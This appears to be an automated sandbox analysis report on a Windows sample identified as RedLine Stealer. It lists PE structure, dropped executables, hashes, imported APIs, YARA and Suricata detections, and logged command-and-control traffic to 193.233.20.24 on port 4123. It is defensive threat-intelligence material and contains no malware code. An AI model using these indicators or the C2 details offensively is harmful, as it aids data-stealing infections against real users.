                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0xa28c0xb4.idata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0xc0000xf7084.rsrc
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x1040000x888.reloc
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x14100x54.text
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x10080x40.text
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_IAT0xa0000x288.idata
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                  NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                  .text0x10000x63140x6400False0.5744140625data6.314163792045976IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .data0x80000x1a480x200False0.609375data4.970639543960129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                  .idata0xa0000x10520x1200False0.4140625data5.025949912909207IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .rsrc0xc0000xf80000xf7200False0.9623946873419322data7.948377611360806IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  .reloc0x1040000x8880xa00False0.746484375data6.222637930812128IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                  NameRVASizeTypeLanguageCountry
                                                                                                                                                                                                  AVI0xcb300x2e1aRIFF (little-endian) data, AVI, 272 x 60, 10.00 fps, video: RLE 8bppEnglishUnited States
                                                                                                                                                                                                  RT_ICON0xf94c0x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States
                                                                                                                                                                                                  RT_ICON0xffb40x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States
                                                                                                                                                                                                  RT_ICON0x1029c0x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States
                                                                                                                                                                                                  RT_ICON0x104840x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States
                                                                                                                                                                                                  RT_ICON0x105ac0xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States
                                                                                                                                                                                                  RT_ICON0x114540x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States
                                                                                                                                                                                                  RT_ICON0x11cfc0x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States
                                                                                                                                                                                                  RT_ICON0x123c40x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States
                                                                                                                                                                                                  RT_ICON0x1292c0xd9d2PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States
                                                                                                                                                                                                  RT_ICON0x203000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States
                                                                                                                                                                                                  RT_ICON0x228a80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States
                                                                                                                                                                                                  RT_ICON0x239500x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States
                                                                                                                                                                                                  RT_ICON0x242d80x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States
                                                                                                                                                                                                  RT_DIALOG0x247400x2f2dataEnglishUnited States
                                                                                                                                                                                                  RT_DIALOG0x24a340x35cdataRussianRussia
                                                                                                                                                                                                  RT_DIALOG0x24d900x1b0dataEnglishUnited States
                                                                                                                                                                                                  RT_DIALOG0x24f400x1b4dataRussianRussia
                                                                                                                                                                                                  RT_DIALOG0x250f40x166dataEnglishUnited States
                                                                                                                                                                                                  RT_DIALOG0x2525c0x168dataRussianRussia
                                                                                                                                                                                                  RT_DIALOG0x253c40x1c0dataEnglishUnited States
                                                                                                                                                                                                  RT_DIALOG0x255840x1e0dataRussianRussia
                                                                                                                                                                                                  RT_DIALOG0x257640x130dataEnglishUnited States
                                                                                                                                                                                                  RT_DIALOG0x258940x150dataRussianRussia
                                                                                                                                                                                                  RT_DIALOG0x259e40x120dataEnglishUnited States
                                                                                                                                                                                                  RT_DIALOG0x25b040x122dataRussianRussia
                                                                                                                                                                                                  RT_STRING0x25c280x8cMatlab v4 mat-file (little endian) l, numeric, rows 0, columns 0EnglishUnited States
                                                                                                                                                                                                  RT_STRING0x25cb40x86Matlab v4 mat-file (little endian) K\0041\0045\004@\0048\004B\0045\004 , numeric, rows 0, columns 0RussianRussia
                                                                                                                                                                                                  RT_STRING0x25d3c0x520dataEnglishUnited States
                                                                                                                                                                                                  RT_STRING0x2625c0x52edataRussianRussia
                                                                                                                                                                                                  RT_STRING0x2678c0x5ccdataEnglishUnited States
                                                                                                                                                                                                  RT_STRING0x26d580x592dataRussianRussia
                                                                                                                                                                                                  RT_STRING0x272ec0x4b0dataEnglishUnited States
                                                                                                                                                                                                  RT_STRING0x2779c0x4b2dataRussianRussia
                                                                                                                                                                                                  RT_STRING0x27c500x44adataEnglishUnited States
                                                                                                                                                                                                  RT_STRING0x2809c0x43edataRussianRussia
                                                                                                                                                                                                  RT_STRING0x284dc0x3cedataEnglishUnited States
                                                                                                                                                                                                  RT_STRING0x288ac0x2fcdataRussianRussia
                                                                                                                                                                                                  RT_RCDATA0x28ba80x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                  RT_RCDATA0x28bb00xd939eMicrosoft Cabinet archive data, many, 889758 bytes, 2 files, at 0x2c +A "pluT14Nj54.exe" +A "grWB27Fb84.exe", ID 2298, number 1, 34 datablocks, 0x1503 compressionEnglishUnited States
                                                                                                                                                                                                  RT_RCDATA0x101f500x4dataEnglishUnited States
                                                                                                                                                                                                  RT_RCDATA0x101f540x24dataEnglishUnited States
                                                                                                                                                                                                  RT_RCDATA0x101f780x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                  RT_RCDATA0x101f800x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                  RT_RCDATA0x101f880x4dataEnglishUnited States
                                                                                                                                                                                                  RT_RCDATA0x101f8c0xfASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                  RT_RCDATA0x101f9c0x4dataEnglishUnited States
                                                                                                                                                                                                  RT_RCDATA0x101fa00xfASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                  RT_RCDATA0x101fb00x4dataEnglishUnited States
                                                                                                                                                                                                  RT_RCDATA0x101fb40x8dataEnglishUnited States
                                                                                                                                                                                                  RT_RCDATA0x101fbc0x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                  RT_RCDATA0x101fc40x7ASCII text, with no line terminatorsEnglishUnited States
                                                                                                                                                                                                  RT_GROUP_ICON0x101fcc0xbcdataEnglishUnited States
                                                                                                                                                                                                  RT_VERSION0x1020880x408dataEnglishUnited States
                                                                                                                                                                                                  RT_VERSION0x1024900x410dataRussianRussia
                                                                                                                                                                                                  RT_MANIFEST0x1028a00x7e2XML 1.0 document, ASCII text, with CRLF line terminatorsEnglishUnited States
                                                                                                                                                                                                  DLLImport
                                                                                                                                                                                                  ADVAPI32.dllGetTokenInformation, RegDeleteValueA, RegOpenKeyExA, RegQueryInfoKeyA, FreeSid, OpenProcessToken, RegSetValueExA, RegCreateKeyExA, LookupPrivilegeValueA, AllocateAndInitializeSid, RegQueryValueExA, EqualSid, RegCloseKey, AdjustTokenPrivileges
                                                                                                                                                                                                  KERNEL32.dll_lopen, _llseek, CompareStringA, GetLastError, GetFileAttributesA, GetSystemDirectoryA, LoadLibraryA, DeleteFileA, GlobalAlloc, GlobalFree, CloseHandle, WritePrivateProfileStringA, IsDBCSLeadByte, GetWindowsDirectoryA, SetFileAttributesA, GetProcAddress, GlobalLock, LocalFree, RemoveDirectoryA, FreeLibrary, _lclose, CreateDirectoryA, GetPrivateProfileIntA, GetPrivateProfileStringA, GlobalUnlock, ReadFile, SizeofResource, WriteFile, GetDriveTypeA, lstrcmpA, SetFileTime, SetFilePointer, FindResourceA, CreateMutexA, GetVolumeInformationA, ExpandEnvironmentStringsA, GetCurrentDirectoryA, FreeResource, GetVersion, SetCurrentDirectoryA, GetTempPathA, LocalFileTimeToFileTime, CreateFileA, SetEvent, TerminateThread, GetVersionExA, LockResource, GetSystemInfo, CreateThread, ResetEvent, LoadResource, ExitProcess, GetModuleHandleW, CreateProcessA, FormatMessageA, GetTempFileNameA, DosDateTimeToFileTime, CreateEventA, GetExitCodeProcess, FindNextFileA, LocalAlloc, GetShortPathNameA, MulDiv, GetDiskFreeSpaceA, EnumResourceLanguagesA, GetTickCount, GetSystemTimeAsFileTime, GetCurrentThreadId, GetCurrentProcessId, QueryPerformanceCounter, TerminateProcess, SetUnhandledExceptionFilter, UnhandledExceptionFilter, GetStartupInfoW, Sleep, FindClose, GetCurrentProcess, FindFirstFileA, WaitForSingleObject, GetModuleFileNameA, LoadLibraryExA
                                                                                                                                                                                                  GDI32.dllGetDeviceCaps
                                                                                                                                                                                                  USER32.dllSetWindowLongA, GetDlgItemTextA, DialogBoxIndirectParamA, ShowWindow, MsgWaitForMultipleObjects, SetWindowPos, GetDC, GetWindowRect, DispatchMessageA, GetDesktopWindow, CharUpperA, SetDlgItemTextA, ExitWindowsEx, MessageBeep, EndDialog, CharPrevA, LoadStringA, CharNextA, EnableWindow, ReleaseDC, SetForegroundWindow, PeekMessageA, GetDlgItem, SendMessageA, SendDlgItemMessageA, MessageBoxA, SetWindowTextA, GetWindowLongA, CallWindowProcA, GetSystemMetrics
                                                                                                                                                                                                  msvcrt.dll_controlfp, ?terminate@@YAXXZ, _acmdln, _initterm, __setusermatherr, _except_handler4_common, memcpy, _ismbblead, __p__fmode, _cexit, _exit, exit, __set_app_type, __getmainargs, _amsg_exit, __p__commode, _XcptFilter, memcpy_s, _vsnprintf, memset
                                                                                                                                                                                                  COMCTL32.dll
                                                                                                                                                                                                  Cabinet.dll
                                                                                                                                                                                                  VERSION.dllGetFileVersionInfoA, VerQueryValueA, GetFileVersionInfoSizeA
                                                                                                                                                                                                  Language of compilation systemCountry where language is spokenMap
                                                                                                                                                                                                  EnglishUnited States
                                                                                                                                                                                                  RussianRussia
                                                                                                                                                                                                  TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                                                                                                                                                                                  192.168.2.3193.233.20.244969941232043233 02/27/23-21:18:20.122346TCP2043233ET TROJAN RedLine Stealer TCP CnC net.tcp Init496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  193.233.20.24192.168.2.34123496992043234 02/27/23-21:18:21.439552TCP2043234ET MALWARE Redline Stealer TCP CnC - Id1Response412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  192.168.2.3193.233.20.244969941232043231 02/27/23-21:18:31.861096TCP2043231ET TROJAN Redline Stealer TCP CnC Activity496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                  Feb 27, 2023 21:18:18.424452066 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:18.446439028 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:18.446657896 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:20.122345924 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:20.144684076 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:20.220628977 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:21.416583061 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:21.439552069 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:21.508327007 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:28.213684082 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:28.239495993 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:28.239624023 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:28.239659071 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:28.239743948 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:28.290103912 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:29.396398067 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:29.437875032 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:29.494502068 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:29.556098938 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:29.578075886 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:29.578485012 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:29.633999109 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:29.650779963 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:29.673506021 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:29.695463896 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:29.720451117 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:29.723774910 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:29.746045113 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:29.765677929 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:29.788840055 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:29.837141037 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:29.953996897 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:29.976097107 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:29.976535082 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:29.982466936 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:30.005038023 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:30.055963039 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:30.089674950 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:30.112140894 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:30.116503000 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:30.138717890 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:30.156924009 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:30.179238081 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:30.193639994 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:30.216684103 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:30.259073019 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:30.526597977 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:30.549205065 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:30.602755070 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:31.400273085 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:31.422163963 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:31.422740936 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:31.477889061 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:31.484872103 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:31.506949902 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:31.507013083 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:31.507611990 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:31.555988073 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:31.652384996 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:31.675062895 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:31.727966070 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:31.835983992 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:31.858417988 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:31.861095905 CET496994123192.168.2.3193.233.20.24
                                                                                                                                                                                                  Feb 27, 2023 21:18:31.883404970 CET412349699193.233.20.24192.168.2.3
                                                                                                                                                                                                  Feb 27, 2023 21:18:31.919533014 CET496994123192.168.2.3193.233.20.24

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  Click to dive into process behavior distribution

                                                                                                                                                                                                  Click to jump to process

                                                                                                                                                                                                  Target ID:0
                                                                                                                                                                                                  Start time:21:17:42
                                                                                                                                                                                                  Start date:27/02/2023
                                                                                                                                                                                                  Path:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                  Imagebase:0x170000
                                                                                                                                                                                                  File size:1046528 bytes
                                                                                                                                                                                                  MD5 hash:0C8E10CF6146A0F67D5E4F784C251FFE
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000003.256542191.0000000004FF8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                  Target ID:1
                                                                                                                                                                                                  Start time:21:17:42
                                                                                                                                                                                                  Start date:27/02/2023
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\IXP000.TMP\pluT14Nj54.exe
                                                                                                                                                                                                  Imagebase:0x390000
                                                                                                                                                                                                  File size:906240 bytes
                                                                                                                                                                                                  MD5 hash:D16ACC7C93BF0ECC8BE14CAE8BE1F15A
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                  • Detection: 54%, ReversingLabs
                                                                                                                                                                                                  • Detection: 47%, Virustotal, Browse
                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                  Target ID:2
                                                                                                                                                                                                  Start time:21:17:43
                                                                                                                                                                                                  Start date:27/02/2023
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\IXP001.TMP\plct23La85.exe
                                                                                                                                                                                                  Imagebase:0x130000
                                                                                                                                                                                                  File size:676864 bytes
                                                                                                                                                                                                  MD5 hash:A19D601A69B407CED85F6C6E721D0E2C
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                  • Detection: 54%, ReversingLabs
                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                  Target ID:3
                                                                                                                                                                                                  Start time:21:17:43
                                                                                                                                                                                                  Start date:27/02/2023
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\IXP002.TMP\plvy67MJ29.exe
                                                                                                                                                                                                  Imagebase:0xfd0000
                                                                                                                                                                                                  File size:397824 bytes
                                                                                                                                                                                                  MD5 hash:C55924DDF020D2D574D1FF1BDF1446FC
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                  Target ID:4
                                                                                                                                                                                                  Start time:21:17:44
                                                                                                                                                                                                  Start date:27/02/2023
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\IXP003.TMP\buze36rj14.exe
                                                                                                                                                                                                  Imagebase:0x900000
                                                                                                                                                                                                  File size:11614 bytes
                                                                                                                                                                                                  MD5 hash:23F943F98B2EEF1D8427BA90111C34E2
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                  Target ID:5
                                                                                                                                                                                                  Start time:21:17:51
                                                                                                                                                                                                  Start date:27/02/2023
                                                                                                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                                  Imagebase:0x7ff6e8c60000
                                                                                                                                                                                                  File size:69632 bytes
                                                                                                                                                                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  Target ID:10
                                                                                                                                                                                                  Start time:21:17:55
                                                                                                                                                                                                  Start date:27/02/2023
                                                                                                                                                                                                  Path:C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe
                                                                                                                                                                                                  Wow64 process (32bit):true
                                                                                                                                                                                                  Commandline:C:\Users\user\AppData\Local\Temp\IXP003.TMP\caQi43qE17.exe
                                                                                                                                                                                                  Imagebase:0x400000
                                                                                                                                                                                                  File size:313856 bytes
                                                                                                                                                                                                  MD5 hash:93E470CB72A45CE819FF3EDB9B4A51B3
                                                                                                                                                                                                  Has elevated privileges:true
                                                                                                                                                                                                  Has administrator privileges:true
                                                                                                                                                                                                  Programmed in:.Net C# or VB.NET
                                                                                                                                                                                                  Yara matches:
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000003.300274214.00000000006D0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.364130402.00000000026EE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.368106745.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000A.00000002.368106745.0000000004A80000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                  • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 0000000A.00000002.363557485.00000000008D6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.362811186.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 0000000A.00000002.362811186.0000000000680000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000A.00000002.362596440.0000000000400000.00000040.00000001.01000000.0000000A.sdmp, Author: ditekSHen
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.368647038.0000000004B50000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000A.00000002.368647038.0000000004B50000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000002.363309849.00000000007A6000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000A.00000003.303183570.0000000000941000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                                  Antivirus matches:
                                                                                                                                                                                                  • Detection: 100%, Joe Sandbox ML
                                                                                                                                                                                                  Reputation:low

                                                                                                                                                                                                  Target ID:12
                                                                                                                                                                                                  Start time:21:18:02
                                                                                                                                                                                                  Start date:27/02/2023
                                                                                                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP001.TMP\
                                                                                                                                                                                                  Imagebase:0x7ff6e8c60000
                                                                                                                                                                                                  File size:69632 bytes
                                                                                                                                                                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
                                                                                                                                                                                                  Has elevated privileges:false
                                                                                                                                                                                                  Has administrator privileges:false
                                                                                                                                                                                                  Programmed in:C, C++ or other language
                                                                                                                                                                                                  Reputation:high

                                                                                                                                                                                                  Target ID:16
                                                                                                                                                                                                  Start time:21:18:12
                                                                                                                                                                                                  Start date:27/02/2023
                                                                                                                                                                                                  Path:C:\Windows\System32\rundll32.exe
                                                                                                                                                                                                  Wow64 process (32bit):false
                                                                                                                                                                                                  Commandline:C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                  Imagebase:0x7ff6e8c60000
                                                                                                                                                                                                  File size:69632 bytes
                                                                                                                                                                                                  MD5 hash:73C519F050C20580F8A62C849D49215A
